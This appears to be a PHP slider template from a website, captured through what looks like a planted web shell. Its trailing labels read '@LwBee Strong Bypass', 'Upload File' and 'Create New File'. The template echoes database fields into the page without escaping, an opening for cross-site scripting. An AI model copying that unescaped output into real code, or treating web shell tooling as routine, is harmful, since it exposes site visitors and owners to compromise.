/home3/vehiclea/public_html/sreemahadevgroup9/slider.php
<?php $select_sliders = select_sliders(); ?>
<section class="home-slider owl-carousel">
<?php while($slider = mysqli_fetch_array($select_sliders)){ ?>
<div class="slider-item" style="background-image:url(Dashboard/<?= $slider['image']?>);">
<div class="overlay"></div>
<div class="container">
<div class="row no-gutters slider-text align-items-md-end align-items-center justify-content-end">
<div class="col-md-6 text p-4 ftco-animate">
<h1 class="mb-3"><?php echo $slider['page_title']?></h1>
<p><?php echo $slider['content']?></p>
<!-- <span class="price">$28,000</span> -->
<!-- <a href="#" class="btn-custom p-3 px-4 bg-primary">View Details <span class="icon-plus ml-1"></span></a> -->
</div>
</div>
</div>
</div>
<?php } ?>
</section>
@LwBee Strong Bypass
Upload File
Create New File